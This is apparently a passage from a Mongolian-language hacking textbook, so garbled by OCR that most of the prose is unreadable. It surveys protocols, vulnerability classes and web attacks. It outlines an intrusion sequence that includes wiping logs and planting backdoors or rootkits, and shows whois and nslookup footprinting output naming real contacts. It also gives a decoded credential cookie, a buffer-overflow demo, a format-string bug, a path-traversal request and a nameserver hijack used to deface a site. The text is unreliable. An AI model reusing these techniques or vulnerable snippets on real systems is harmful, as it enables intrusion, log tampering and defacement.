POP3 us eueeaep nu:epua: aax xaMrnüu unü:nar npo:okonbu uar
kM. 3ua us anek:pou myyaaur nporpaMa opyynaxaa xaparnaraaar. Baayy
:an us POP3-nüu nxaux vünunvvnaruna a-myyaaur cepaep aaap
xaaranaar. HüM Masraap a-myyaaurnüu xyynôapbr xnüaar.
POP4 oaooroop uar nx aanrapaarvü ôaüraa u eep:ee POP3 mnux
uauapaac raaua nnvv onou ôonoMxnür aryynx ôaüua.
40
- NNTP -
Network News Transfer Protocol us Usenet News rax uapnaraaar News
vünunnraauvvanüu xauaan:br raprax eraer. ARPA cvnxaau aax Maaaanan
:apaax, xaüx, uyrnyynax rvüua:raaar npo:okon. NNTP us SNTP ôa TCP
xoëynaurnüux mnux uauapbr aryyncau ôaüaar.
- SNMP -
SNNP ôon Simple Network Nanagement Protocol racau vrunü :oaunon
kM. Tap us aryynaru ôa unrnvvnarunür manrax yanpaaxaa xaparnaraaar.
SNMP-nüu xaparnaruanüu nxaux us :vvunür unrnvvnarunür manraxaa,
aaa:aMxnüu yp:bu amnrnan:br vsvvnax ôa SNNP-bu xsuan:bu ep:eeua
Meccax nnraaxaa xaparnaaar. SNNP-nüu xaMrnüu unü:nar xsuan:bu
nporpaM xauraMx ôon HP Openview kM. Haa:paruna SNNP-nür cvnxaar
uaaxaa ôonou cvnxaar eepunex ôyky :acnaxaa xaparnaaar. Aryynaru
aaapx SNNP us syraa:aü, :ap onou counpxon:oü Maaaannnür nnpvvnaar.
- ARP -
Address Resolution Protocol us dnsnk xasr: nu:epua:nüu xasrnüu
ôaüpmnbr :or:oouo. 3ua us Maaaannnür unrnvvnaxaa aMnu uyxan kM.
ARP us OSI Moaennüu Net work :vamnua ôaüaar.
- I CMP -
!nternet Control Nessage Protocol us koMnsk:epvvanüu xoopoua
Maaaanan aaMxyynax vea anaaaub ôa xsuan:bu aoxnor yanpaaar. !CNP
us cvnxaau aax acyyanyyabr ouomnoxoa uyxan vvpar:aü. Ta ônaunü
caüu Maaax ping koMaua us vvunü uar xaparnaa.
- DHCP -
Dynamic Host Configuration Protocol us koMnsk:ep ao:ooa cvnxaaua
ôaüxaa xapar:aü vea us !P xasraap aa:oMa:aap xauraaar.
41
- SSL -
Secure Sockets Layer racau vrnüu :oaunon ôereea TCP/!P aaMxnx
ôaüraa Maaaannnür euaep uyyunan:aüraap aaMxyynax sopnnro:oü. SSL
amnrnax ôaüraaraa https://-p Meu aaô ôpaysepbu c:a:yc xacar: xaparaax
SSL icon-p us Maaax ôonuo. Neu SSL xaparnax ôaüraa caü: ôpaysepbu
aooa euuer: uooxub sypar rapaar. Cepaep ôonou knneu: :anyyaaac
SSL :oou cep:ndnka: ôonou public-private :vnxvvpaap uaa:pax apxnür
manraaa :vvua sopnynx session vvcraua. Yvunür seaxeu cepaep ôonou
knneu: :anyya n :aünx yumnx uaaaxaap encrypt xnücau ôaüaar. HüM
yupaac visa kap:bu ayraap Ma:nür ôerneaer xyyaacuyya aauaaa vvunür
amnrnacau ôaüaar. Xapaa vvunür amnrnaxrvü ôon visa kap:bu ayraap
sMap u xvu saMaac us ôapnx ôonoMx:oü. XapaMcan:aü us SSL-r
xakepaax saMaac us onx aaax ôonoMx ôac ôaüaar kM.
- TFTP -
TFTP ôon :aub uaüs kM. TFTP sMap uar ôa:anraa maapaaxrvü, :ap
nxaaunau cvnxaaunü :ouor :exeepeMxna ôonoMxnüu uar: avpcaa onoxoa
xaparnaraaar. ¬nrnvvnaru TFTP-a UN!X/Windows xaüpurnür cyynrax
ôonuo, :araaa aua xaüpuaruaac eepnüu avpcaa raprax aaua. TFTP us UDP
npo:okonbr xapar:aü ôonroaor.
TFTP cepaep us uaa:paruna sMap uar daünbr eep:ee mnnxvvnax
ôonoMx onroaor. Hnvv cvvnnüu venüu xyannôap us :aubr xvu ôvpnüu
yumnx ôonox daün pyy opoxbr xssraapnaaar. Taraaa :a eepnüree FTP-
:aü :ec:aü naanaxaa ¨xopnracou" ôonoxbr onx Maaua. TFTP ôa FTP
xoëpbu xoopouaox eep uar snraa us raaan :a uap ¨!s" koMauarvü sMap
daün xvcax ôaüraaraa Maaax xapar:aü ôonuo. Faau aapaa us :a uap
aaxnaa sapnM Maaaannnüu couron:br xnüx ôonuo.
- Root ki t -
Xakepyya vpranx cnc:eM pvv uaa:pax mnua apra saMbr apx ôaüaar.
Taa rootkit Ma: svüncnür amnrnax xanaax ôonoMxoo uaMaravvnaar.
Rootkit raaar ôon uyyuaap cyyaar nporpaMbu xacar ôereea eepee saaaan
xop xoxnpon yupyynaar ôaüx anôarvü. Xakep ununü ky xnüx, sMap
42
nporpaM amnrnax ôaüraa :yxaü Maaaannnür uyrnyynaxbu :yna vvunür
amnrnaaar.
- Vul nerabi l i t i es, Thr eat s, Count er measures -
KoMnsk:epnüu cnc:eMa akynrvü ôaüaan:aü xonôoo:oü 3 vr ôaüaar.
vulnerabilities, threats, countermeasures. 3araapnür opuyyn¡s raxaap uar
vrunü opoua ôv:au ervvnôap :aanx xapar:aü ôonooa ôaüua. HüMaac myya
:aünôapbr us xanse. 3apnM xvMvvc raaaaa vrnür xa: Mouronunnx
opuyynaaa ky xanaaa ôaüraa us oünroraoxoo ôonsunxaor. Aurnnap
rauuxau vr xanaaa oünrox svünnür xaaau ervvnôap ôonrox ôycabu
:onroür aprvvnaaa saxaa.
Vulnerabilit y raaar ôon cnc:eMnüu aMapxau xanaax ôonox uvx kM.
Threat ôon cnc:eMa akyn :apnru. 3ua us xvu (cracker) acaan sMap
uar xaparcan (equipment ) acaan vünaan (vepnvvnax, aoa:nox) u ôaüx
ôonuo.
Oepnüuxee cnc:eMnür xananaraac xaMraanaxbr Count ermeasure rax
uapnaaar.
Bvx koMnsk:ep ôonou nporpaMa vulnerabilit y (uvx) ôaüaar. HüMa
xakepyya cnc:eM xanaaxaaa aaraap uvxnür amnrnaaar. 3araap uvxvvanür
ao:op us aapaax ôaüanaap aurnnaar.
1nsnk uvx - 3ua ôon ôoan: aMsapanbu uvx kM. Xau uar :aub epeeua
opx npaaa xapar:aü daün ôvxnü ancknür unus aaaaa saax ôonoMx:oü.
Baürannüu uvx - Yvua ôaürannüu akyn raMmnr opx ôaüraa kM. Yep,
ran :vüMap, rasap xeanen: rax Ma:. Neu :ooc mopoo, unürmnn us :aub
koMnsk:epnüu Maaaannnür amnrnax ôonoMxrvü ôonrox ôonuo. Ta
koMnsk:epnüu Maaaannaa anaax uvx raxaap myya koMnsk:epnüu cvnxaa
ôoaox ôonoxrvü raarnür auaaac xaparaax ôaüua. HüMa :or raua:
:acpaxaac caprnünx :or ôapnru, xa:yy anckau aaapx xapar:aü Maaaannaa
CD rax Ma: svünc aaap ueeuenx aaaxbr seanex ôaüua.
HporpaMbu ôa :exunknüu uvx - Texunknüu anaaa us koMnsk:epnüu
cnc:eMnür ôvxana us akyna opyynua. Lnua :exeepeMx cyynrax sau us
:aub xaan::aü ôaücau xaMraanan:br ouroünroaor :oxnonaon ôaüaar.
HporpaMbu anaaar Xakepyya ronayy cnc:eMnür rauaax sopnnroop
amnrnaaar. Bydep avvprax, vepnvvnax rax Ma:aap.
43
Orerannüu uvx - ºMap uar xanaaapnacau ôyky :aruyyn xnüx
sopnnro:oü daünyyabr eepnüu koMnsk:ep:aa xyynax. Xnmaa us Trojan,
spyware.
Xonôon:bu uvx - Ta nu:epua:aa opoxaoo dail-up rax Ma: svüncaap
opaor ôon aua us ôycaaa :aub cnc:eMnüu uvx ôonx xaparaaua. Xnmaa
us Wireless-p opoxoa Maaaannaa araapaap aaMxyynx connnuaor :yn
saMaac us ôapsx aaax ôonoMx euaep ôaüaar.
ºMap u caüu xaMraanan:bu cnc:eM :aanaa :auaü AaMnu unus Myy
Maanar:aü ôon cnc:eM unus svraap n ôeeu uvxunü uyrnyynra ôaüx ôonuo.
Threat -r ao:op us 3 aurnnaar ôaürannüu, cauaa:aü, cauaauarvü.
Baürannüu raaar us eMuex:aü nxnn y:ra:aü.
Cauaauarvü raaar: Myy aaMnu:aü acaan akynrvü ôaüanbu :an aaap
Myy Maanar:aü ôaüx ôonuo. Xaparnaru cauaauarvüraap daün yc:rax,
aaMnu uyyu vr aryyncau daünbu xauaax apxnür eepunex sapraac ôonx
ôonuo.
Cauaa:aü raarnür raauaac ôa ao:pooc rax xoëp aurnnua. Faaaaa
areu: vea mnuaap nporpaM cyynrax vea ao:op us ôaüx ôaüraaa
nporpaM:aü xaM: cyyx cnc:eM akyn yupyynaar. Neu Teppopnc: rax
ôaüaar ôereea aaraap us nx cypryyns, mvvx rax Ma: ôaüryynnarbu
koMnsk:ep nvv xanaaar. 3acrnüu raspbu cauaar soaooaor uar aaüpan:
us DoS aaüpan: kM.
KoMnsk:epnüu raM: xapar Xakepyyaaa amnr:aü ônsuec kM. ºMap uar
ôaüryynnarbu Maaaannnür xyynx aaaaa, xnuxaunür us yc:raaa xapaa
xancau Meurnür us erexrvü ôon xapar:aü daünbr us yc:raua rax
cvpavvnaar.
Hxaux xaMraanan:bu cnc:eM raaub aaüpan:aac xaMraanaar. Faau
vuauaaa xananarbu 80 opunM xyas us ao:pooc ôaüaar. Xnmaa us axnaac
us xancau axnn:au. Taa uyyu Maaaannvvanür us epcenaeruna us erexeec
aaxyynaaa ky u xnüx ôonuo.
Naaaannaa xaMraanax onou apra ôaüaar. Baap aypsacau anaaauyyabr
rapraxrvü ôaüxaa n :a xaMraanx ôaüua racau vr mvv aaa.
Orerannür encrypt xnüx us xaMrnüu caüu Maaaanan xaMraanan: kM.
Yvunür seaxeu apx ôvxnü xaparnaru n xaparnax ôonoMx:oü ôaüaar. Xapaa
aypbu xaparnaru decode xnüx rax oponaaon vuacau :vnxvvpnür us
Maaaxrvü yupaac ky us Maaaraaxrvü ôeeu :aMaar: onx xapua. Faau
cepaep aaapx private key-r onx aacuaap aMapxau :aünax ôonoMx:oü.
44
45
- 6vnsr 3 -
Baô xakepaax
“ I mpossiblit y: A word only t o be found in t he dict ionary of fools. ”
- N. Bonapart
46
47
- Bsõ xaxeppax vapsc -
Baô xakepaaxaa xaMrnüu nx xaparnaraaar nporpaM ( t ool) ky aa? rax
uaaaac xau uar us acyyaan ôn xapnya us web browser(I nt ernet explorer,
Firefox, Net scape rax Ma:) rax xapnynua. Ta saraaa aurnüu aaô vsaar
nporpaMbr nurax xancunür raüxax ôaüraa ôaüx.
Yvunür ¨Xy:ra"-:aü xapsuyynx oünrox ôonuo. Xnmaa us, :a xy:rbr
eaep :y:aM aMsapanaaa xaparnaaar. XnaM :anxaa svcaxaac axnaaa n,
ra:an xy:ra Maaus sapnMaaa xvu anax xvü:au saacar ôonaor. Yvu:aü
aannaap Web browser-r caüu Myy ans u sopnnroop amnrnax ôonaor.
Annaaa nporpaMa sMap uar anaaa ôyky uvx saaaan ôaüaar. Yvunür
apx onuo raaar yürarvü xeaenMep maapacau axnn ôaüaar. 3apnMaaa
ôara sapar sans xaparnaxrvü ôon aMsapana xauvv ôaüaar mvv aaa.
Xnmaanôan, :a uap Chessmast er 10 rax :ornooMbr Maaax ôaüx. Bn sax u
xnuaaraaa xaMrnüu euaep sapar:aü Chessmast er-nür us xoxnx uaaaxrvü
ôaücau kM. Taraxaap us ôn xoxnx ôonox uvx xaüx axannaa. Yaanrvü ôn
Chessmast er-nür us aapaanau 10 yaaa xoxcou kM. Xoxnxoop eeaeec uar
cep:ndnka: eraer kM ôaüua naa. HaMaür sax xoxcou rax ôoaox ôaüua?
Bn nx aurnüu apra xaparnacau us n aaa. Chessmast er-:aü :ornoxaoo
uarnür us 1 Mnuy: aaap :aasunxcau kM. Chessmast er-nüu uarnür
:vpvvnx ayycrax sopnnro:oü. Huraaa n ôn :ap cep:ndnka:br xvccau
:ooroopoo aau ôonx ôaüraa kM. Haaaa ma:pbu nx aassac ôaüxrvü u
:vvunü anaaar amnrnaaa xoxunx yxaau ôaüua raaar unus ôonx ôaüraa
ôns aaa.
I nt ernet Explorer-a DHTNL Me:oa ôonox createTextRange() us
xakepyyaaa koaoo axnyynax ôonoMx onroaor uar uvx kM ôaüua. Neu
RDS.Dataspace ActiveX kou:pon us Meu nüM anaaa:aü kM ôaüua. 3ua Ma:
anaaa xauran::aü nx ôaüraa xapnu aaraap uvxnür svraap uar Maaax ônm
kyua amnrnaxaa n caüu Maaaar ôaüx xapar:aü.
Baô xakepaax Mam onou apra ôaüaar, xnmaanôan aaônüu vuacau
koaoua eepunen: opyynax apra. 1998 oua Hx Bpn:aunü Xakep 300 opunM
aaô xyyaacub :ekc:nür consx :aascau. Baô xakepaax apryyabr :epneep
us snrax ônuaan:
Aut hent icat ion:
Brut e Force aaüpan:
Xauran:rvü Aut hent icat ion
48
Nyy uyyu vr couron:
Aut horizat ion:
Session amnrnax
Xauran:rvü Authorization
Xssraapnan:rvü Session
Session eepunex
Knneu: :anbu aaüpan::
Cont ent Spoofing
Cross-sit e Script ing
KoMMaua:aü aaüpan::
Bydep avvpax
TaMaar: Mepnüu anaaa
LDAP I nj ect ion
OS inj ect ion
SQL I nj ect ion
SSI I nj ect ion
XPat h I nj ect ion
Naaaanan nnpvvnax:
Bnpek:opbu xarcaan:
Naaaanan xynraünax, onx aaax
Bnpek:opbu saM xeex
1aünbu ôaüpnan :aaMarnax onox
Pornk aaüpan::
1yukunür eep sopnnroop amnrnax
Denial of Service (DoS)
Defaut ôyky aa:oMa: :oxnproo
Pornk anaaa:aü vünaan
Baô xakepaaxbu :yna epeuxnüaee aapaax anxMyyabr aaMxnua.
1. 3xnaaa System network scan xnüua
2. Bapaa us xanaax apraa courouo
3. Cnc:eMa uaa:apu syslog-nür sorcoouo
4. Log-ooc eepnüu !P ôvxnü Maaaannnür yc:raua
5. Backdoor kMyy Rootkit cyynraua
6. Jargon-oo axanua... Jargon raaar us Xakepyyabu xan rax oünrox
ôonuo.
49
Xakepbu rapbu vcar:
Xapaa :auaü ôaüryynnara e-commerce caü: xaparnaaar ôon
xananarbu :oo ynaM n nx ôaüx ôonuo. Hxaux xananara Common Gateway
!nterface (CG!) nyy unrnacau ôaüaar, aapaa us TCP nop: kM. Cvvnnüu
vea !NAP-r amnrnax Storm aaüpan: xnüx us nxcax ôaüraa racau
c:a:nc:nk rapcau ôaüua naa. Baüpan:bu :ooroopoo AHY, OMuea
Conouroc, svvu Eaponbu opuyya :aprvvnx ôaüua. Ourepceu oua n raxaa
AHY-nüu koMnaunyaaa unü: 266 cas aonnapbu xoxnpon yupyynxaa.
Neu cepaep ôonou nporpaMyyaaa Mam onou backdoor (apbu xaanra)
ôaüaar ôereea UN!X-nüu uar backdoor ôon ¨ls" koMMaua daünbu
xarcaan:br xapyynaar. Amnrnacau :oxnonaona xyascaru us ônunraax
vnaaar.
SSH-nüu (secure shell) backdoor ôon xaparnax ôaüraa xaparnarunüu
:yxaü Maaaanan ônunx aaaar ôonoau log daünaa aana rasap xaaranax
xapar:aü. Baô xakepayynax ron vuacvvanüu uar us backdoor ôonaor.
Footprinting ôa Scanning ôon xakepaax vuacau anxaM. Baüpax
oô¡ek:buxoo :yxaü ôvpau avvpau Maaaanan uyrnyynx ôaüx cas aaüpax
xapar:aü. Whois, AR!N ôon aoMaüu uapnüu :yxaü Maaaannnür erue.
Traceroute ôa mail tracking us Spoof xnüxaa xapar ôonuo. Footprinting sr
50
:oaopxoü ôaüx xapar:aü aua us sMap uar kM xnüxaacaa eMue :aruyynaax
sopnnro:oü. Nmap nporpaM uaMa xapar:aü Maaaannvvaaa aaaxaa :yc
ôonuo.
Kyub eMue aaüpax oô¡ek:buxoo aoMaüu uap, cvnxaaunü ônok,
cvnxaaunü vünunnraa ôa annnnkeümuyya, cnc:eMnüu apxn:ek:yp,
xananara xsuax cnc:eM, !P xasr, uaa:pau opox saM ôonou xapar:aü
Maaaannnüu xarcaan:, y:acub ayraap, xapnnuax xasr aaraapnür Maaax
xapar:aü. Hop:yyabr uaruax, SYN, F!N, Connect, ACK, RPC, FTP, !dle
Scan-yyaaap :ypmnx. Ans nop: uaan::aü ôaüraaraac xaMaapu xanaax
apraa courox xapar:aü ôonuo.
Har ron xaparcan ôon whois ererannüu cau, whois cauraac aoMaüu
uapnür opyyncuaap aaMnunc:pa:op, asaMmnrunüu xasr y:acub ayraap
ôonou ôycaa Maaaannnüu :yxaü aanrapaurvü Maaax ôonaor. ºaraaa raaan
aoMaüu uapnür xau asaMmnx ôaüraa us ôvraaa nn ôaüx ëc:oü racau onou
yncbu avpaM ôaüaar.
Linux vünannüu cnc:eMa nurax xapaar nporpaM auxuaacaa
cyynraac:aü ôaüaar. Xapnu anaap: Windows-: ôon ôaüxrvü. DNS-nüu
:yxaü Maaaannnür nslookup amnrnax aau ôonuo.
C: \ > nslookup www.google.com
Server: dnsr1.sbcglobal.net
Address: 68.94.156.1
Non-aut horit at ive answer:
Name: www.l.google.com
Addresses: 64.233.187.99, 64.233.187.104
Aliases: www.google.com
Regist rant :
Pearson Technology Cent re
Kennet h Simmons
200 Old Tappan Rd .
Old Tappan, NJ 07675 USA
Email: billing@superlibrary.com
Phone: 001-201-7846187
Regist rar Name....: REGI STER.COM, I NC.
Regist rar Whois...: whois.regist er.com
Regist rar Homepage: www.regist er.com
DNS Servers:
51
usrxdns1.pearsont c.com
oldt xdns2.pearsont c.com
3a sMap u ôaücau aaraap Maaaannnür aacau ôon oaoo AR!N whois-aap
uar opooa xap¡s. 192.1/.1/0.1/-r AR!N whois pvv ônunxaa aapaax
Maaaannnür ôyuaax aanaa. Baô caü: us www.arin.net .
OrgName: Universit y of I llinois
OrgI D: UI UC
Address: 1120 DCL, MC-256
Address: 1304 West Springfield Avenue
Cit y: Urbana
St at eProv: I L
Post alCode: 61801
Count ry: US
Net Range: 192.17.0.0 - 192.17.255.255
CI DR: 192.17.0.0/ 16
Net Name: UNI V-I L
Net Handle: NET-192-17-0-0-1
Parent : NET-192-0-0-0-0
Net Type: Direct Allocat ion
NameServer: DNS1.CSO.UI UC.EDU
NameServer: DNS2.CSO.UI UC.EDU
NameServer: DNS1.I U.EDU
Comment :
RegDat e:
Updat ed: 2004-02-18
RAbuseHandle: UI UCS-ARI N
RAbuseName: UI UC Securit y
RAbusePhone: + 1-217-265-0000
RAbuseEmail: abuse@uiuc.edu
RTechHandle: CK185-ARI N
RTechName: Kline, Charles
RTechPhone: + 1-217-333-3339
RTechEmail: kline@uiuc.edu
52
3uaaac aaüpax oô¡ek: Maaus 25+ xasr:aü, 192.17.12.1-ooc
192.17.12.254 / 24 xvp:an. Oaoo vpranxnvvnaaa Tracerout e xaparnae.
Tracerout e ôon aaüpax oô¡ek:bu saMbr :oaopxoünox sopnnro:oü.
Linux traceroute us UDP aaap, Windows us !CNP aaap cyypnnaar.
C: \ > t racert 192.168.1.200
Tracing rout e t o 192.168.1.200:
1 10 ms < 10 ms < 10 ms
2 10 ms 10 ms 20 ms
3 20 ms 20 ms 20 ms 192.168.1.200
Trace complet e.
Boa:nox rax ôaüraa Mamnu Maaus acaan::aü ôaüraa acaxnür
Maaaxnüu :yna ping nnraaxaa ôonuo. Bapaax nporpaMyya ping sweep
aryyncau ôaüraa :ypmnx vsua ôns.
- Angry I P Scanner
- Pinger
- WS_Ping_ProPack
- Net work scan t ools
- Super Scan
- Nmap
Hop: uaruax raaar us TCP ôa UDP nop:oop ky xnüx sMap nporpaM
axnnnax ôaüraar us :or:oox sopnnro:oü.
Baônüu xaMraanan: raaar vuaxaap :oM acyyaan, Hu:epua: ôon Mam
:oM cvnxaa :vvua Mam onou :ooub uvx ôaüraa. Kyub eMue xapaa :a
Nicrosoft !nternet explorer xaparnaaar ôon Privacy-r Higher ôonrox
xapar:aü.
Xvunü uyyu vrnür onox onou apra, nporpaM ôaüaar. Ta :ap xvuaa
caüu Maaaar ôon :epceu eaep rax Ma:aap :aax onx ôonuo. Neu uyyu vr
:aünaxaa Dictionary attack xaparnax ôonuo. 3ua us vrnüu xarcaan: ôaüx
ôereea :oxnpox vrnür on:on xapsuyynx xeex onuo. 3caan hybrid apra
ôaüx ôonuo. 3ua apra us eMuex:aü oüponuoo ôereea ron us aaap us :oo
ôonou :ycraü :aMaar: uaMx opyynaar ôonuo. Oaoo xvMvvc uyyu vraa
caüxpyynaxbu :yna :oo xonsx opyynax us nx ôoncou.
53
3caan cookies xynraünx ôonuo. Boa:noru koMnsk:epaac unus cookie
xynraüncuaap uyyu vr, xaparnarunüu uap rax Ma: svüncnür onx aaax
ôonoMx:oü. Ep us aua :auaxnüu caü: vsax ôaüxaaa Mnunü xaparnarunüu
uap, uyyu vrnür xaaran racau :oxnproor xnüx us xaMrnüu apcaan:aü
anxaM kM.
UI D= bWlrZTpt aWt lc3Bhc3N3b3JkDQoNCg; expires= Fri, 20-Nov-2006
Yvunür xapaaa xvu ky u oünroxrvü ôonoau Base6+ decoder ôaüxaa
mike:mikespassword raaa n rapaaa npua aaa.
Java-r ôv:aacau Sun kopnpaunüuxau ¨Baô annnnkeümuyyabu 95¾ us
sMap uar uvx:aü ôaüaar" racau avruan: xnüxaa. Baô caü:yyabu xanaax
ôonox uvxnür xyanap xapaan:
• Cross-sit e script - 80%
• SQL inj ect ion - 62%
• Paramet er t ampering - 60%
• Cookie poisoning - 37%
• Dat abase server - 33%
• Web server - 23%
• Buf fer overflow - 19%
- XaMraãa ax xanpnarap op1por 10 avx -
N Windows cnc:eM Unix cnc:eM
1. I nt ernet I nformat ion Services BI ND Domain name syst em
2. Microsoft SQL Server Remot e Procedure Call
3. Windows Aut hent icat ion Apache Web Server
4. I nt ernet Explorer Aut hent icat ion Account s wit h No
Passwords or Weak Passwords
5. Remot e Access Services Clear Text Services
6. Microsoft Dat a Access
Component s
Sendmail
7. Windows Script ing Host Simple Net work Mail Prot ocol
8. Microsoft Out look Secure Shell (SSH)
9. Windows Peer t o Peer File
Sharing (P2P)
Misconfigurat ion of Ent erprise
Services NI S/ NFS
10. Simple Net work Mail Prot ocol Open Secure Socket Layer (SSL)
54
- XaMraãa ax xanpnarap op1por DOPTYYB -
1. Hop: 80 (Web/ HTTP) - 45.54%
2. Hop: 13/ ( Net BI OS) - 20.22%
3. Hop: 1+3+ (SQL) - 13.68%
4. Hop: 1985 (HSRP) - 3.52%
5. Hop: 138 ( Net BI OS) - 3.38%
6. Hop: 25 (SMTP) - 3.37%
7. Hop: 161 (SNNP in) - 3.34%
8. Hop: 162 (SNNP trap) - 3.26%
9. Hop: 21 (FTP) - 1.75%
10. Hop: ++3 (HTTPS) - 1.55%
- Cepaep conax apra -
XaMrnüu aurnüu counpxon:oü apra ôon aoMaüu uapnür eep cepaep
nvv xonôox kM. Xnmaanôan ôn www.hacker.mn-r xakepaaxaap mnüanaa
rax ôoa¡ë. Faau aua caü: xaMraanan: caü:aü Mnunü Maaax apryya
ôonoxrvü ôaüaan sax aa? 3ua aaô caü:br xakepaax uaaaxrvü us raaa
opxnn:oü us ônm aaa. Taraxaap aaap aypacau apraap xakepacau Ma:
xaparaax ôac ôonuo. 3xnaaa ôn sMap uar cepaep xyaanaax aaaaa
nameserver-nür us :aMaarnax aaaaa cepaepaa connx ôoncou :yn aapaax
cepaep nvv xonôox erue vv racau n-Maünnür aoMaüu uapnüu nameserver
consx uaaax apx Maaan:aü ôaüryynnara xyas xvu pvv nnraaraaa n ôonoo.
Oaoo uarau: eepnüu cepaep aaap ôaüraa kM unus ao:op us ky u rax
ônucau ôonuo. ¨Xakepacau Nongolian Hacker Team ® 2006" racau ônunr
opxnunxuo. XvMvvc www.hacker.mn caü: pyy opoxoa eeaeec us nüM
ônunr yr:ax ôereea ¨3ua caü: xakepayynunxax, aua xakepacau ôar sMap
nar kM ôa?" n rax ôoauo. Xapnu vuauaaa ôon xnuxaua aaô cepaepnür
xakepaaarvü ôereea xnuxaua aaô Maaus ky u eepuneraeervü xaaaapaa n
ôaüx ôaüx ôonuo. Xapnu asaMmnru asaa axnaaa raüxax ôaüx n aaa.
Xapnu yaaxrvü oünrooa ôyuaaraaa consunx ôonuo.
3ua ôon Xakepaax ôonoMx Mam onou ôereea xakepaaua raxaap nop:
manraaa uvx xaüx u kMyy :nüMapxvv svünnür vpranx ôn:rnü ôoaox ôaü
racau vr kM. KoMnsk:epnüu cnc:eMnüu uvxuaac raaua xvunü vün
axnnnaraaub uvx rax ôaüaar ôereea aua ôvranür onx xapx uaaaar ôaüx
xapar:aü.
55
Xspxsa xaMraanax as?
Bnauaac uar nx xaMaapaxrvü aaa. Fonayy aoMaüu uapnüu nameserver-
nür consx uaaax apx Maaan:aü xvMvvcaac n xaMaapua. HüMa nüM
vünunnraa sayynaar ôaüryynnara xyas xvMvvc xyypaMu n-Maünaac
ôonrooMxnox xapar:aü. Bonx eraen ôa:anraaxyyncau us xau xauaaa aaap
mvv aaa.
- Buf f er Overf l ows -
Baô xakepaax :yxaü sMap u uoMbr yumcau xaMrnüu axaua ôydep
avvprax aprbr ônucau ôaüraa. XaMrnüu auxub :oM exploit us 1988 oua
rapcau nu:epua: e: (worm) ôaücau. Bydep avvprax raaar us ôydepbu
aau uaaax xaMxaauaac nnvv ererannür ôydep pyy xnüxaa vvcua.
3ua anaaa us Maccnabu xaMxaauaac opyyncau Maaaanan xa:apcau
acaxnür manraaarrvü C xan aaap :oxnonaaor. C xan aaap Maccna us
c:a:nk acaan anuaMnkaap sapnaraaar. C:a:nk xyascaru us ererannüu
cerMeu:nüu xacar: auaanx axnax sauaa cauax oüu xacrnür aau
axnnnaua. BnuaMnk xyascaru us axnnnacub aapaa c:ek: cauax oüu
xacrnür aau axnnnaua. Fonayy aoopx dyukuyyabr amnrnax ôydep
avvpraaar.
st rcpy ( char * dest , const char * src)
st rcat (char * dest , const char * src)
get s (char * s)
scanf ( const char * f ormat , … )
printf (conts char *format, . ). rax Ma:.
Xnmaanôan nüM koa ôaünaa rax ôoaoxoa 16 yp::aü ôydep: 256
yp::aü Maaaanan uaMaxaap Maaaax anaaa rapu :aapua. 1yuku ôyuaxaaa
aapaarnüu vünanaa yumnx uaaaxrvü yunp anaaa saax ôaüraa kM. Taraan
aua aapaarnüu vünaan aaap us eepnüu Shell koaoo axnyynaxaap saaraaa
erunxaer. Huraaa n :a apxaa onx aaua. Faxaaa aua aprbr xnüxnüu :yna
koMnsk:epnüu cauax oüu :anaap caüu Maanar:aü ôaüx xapar:aü.
Expoloit -oo ônunx uaaaxrvü ôon ôanau exploit seuaee ôaüaar ôonoxoop
onx aaaaa axnyynaaa ôaüx aaa.
# include < st dio.h>
# include < st dlib.h>
void f unct ion( char * st r)
{
56
char buffer[ 16] ;
st rcpy(buf fer,st r);
}
void main()
{
char st ring[ 256] ;
int i;
for( i = 0; i < 255; i+ + )
st ring[ i] = ' Z';
funct ion(st ring) ;
}
Xspxsa xaMraanax as?
Akynrvü xan aaap nporpaMaa ônunx, Java xan aaap ôon nüM anaaa
rapaxrvü. Koaoo usr:anx manrax xapar:aü. eEye Retina, !S!C rax Ma: uvx
manraru amnrnax ôonox kM.
- For mat st r i ng anpaa -
Aux 2000 oub 6 capa aua aprbr Maacau. Op:aer dyukuyya us printf,
fprintf, sprintf, vprintf, vfprintf, vsprintf rax Ma:.
int func( char * user) {
fprint f( st dout , user);
}
Xapaa user = ¨¾s¾s¾s¾s¾s¾s¾s" raaan acyyaan vvcax axanx
ôaüraa kM aaa. Huraaan user = ¨¾n" ôvp u nx acyyaan vvcraua aaa.
3ua anaaar us nurax sanpyynx ôonuo.
int func( char * user) {
fprint f( st dout , “ %s” , user);
}
57
- Bsõ xyypacaaac asa1psx spx xaãx -
Annaaa sMap u aaô xyyaacub aaMnuaap uaa:pax raxaa eeaeec
xaparnarunüu uap uyyu vr xoëpbr acyyaar. Ta :aua sMap u xaMaarvü kM
ônuaaa erexea eeaeec xaparnarunüu uap acaan uyyu vr ôypyy ôaüua
racau anaaa erarnür xvu ôvp Maaua. Bnaunü erceu xyaan xaparnarunüu
uap, uyyu vr vuau acaxnür manraxbu :yna :yxaüu aaô xyyaac uaauaa
xnuxaua xaparnarunüu uap uyyu vrnüu uar rasap xaaranaar ôaüx :aapua
ôns. 3uaaac :a :ap uyyu vr:aü daünbr onooa aaunxaan ôonox kM ôaüua
rax ôoaoraox ôaüua yy? Naaaax aaô xnüx ôaüraa xvu u racau vvunür
Maaax yupaac sus ôvpnüu apraap uyyxbr xnuaax ôonuo.
3ua uyyu vr :aax onox acaan brut ef orce xnüx :yxaü ônm svraap myya
uyyu vr:aü daünbr onox :anaap sypraap :aünôapnas. 3xnaaa :yxaüu aaô
xyyaac vsaxaaa sax axnnnax ôaüraar xap¡s.
/ cgi-bin/ show?../ ht ml/ apps.ht ml Taraxaap aua aaônüu xyyaacuyyabr
vsaxnüu :yna show-r amnrnaaar kM ôaüua.
58
AaMnub nornu xnüaar xacar aua ôaüua. 3ua xyyaac eep aaapaa
xaparnarunüu uap uyyu vrnür manraaar xacrnür aryyncau ôaüx :aapua.
Faxaaa uyyu vr xaparnarunüu uap aua xyyacauaaa xaaranaraax ôaüraa
rax ôn ôoaoxrvü ôaüua.
HüMaac :vvunü ao:opx koabr xapx xaauaac xaparnarunüu uap uyyu
vraa aau ôaüraar xap¡s. Xapnu myya vsaan Maaaax HTML xanôapaap
ôpaysep nyy ôyuax yupaac ôn PHP koabr us xapx uaaaxrvü kM ôaüua.
Tvpvvunüu show-nür amnrnaaa vsse.
Bo:pooc us ôn secure.php xyyacbr include xnücunür onnoo. 3yprau
aaapaa :a xapx ôaüraa ôns aaa. Hyyu vr xaparnarunüu uapaa xvMvvc
ronayy include ao:op php.ini daünaaa xnücau ôaüaar.
59
Oaoo phpSecurePages/ secure.php ouroünrox vsaaa :a xapaaa.
Bnaunü xaücau svün onanoo.
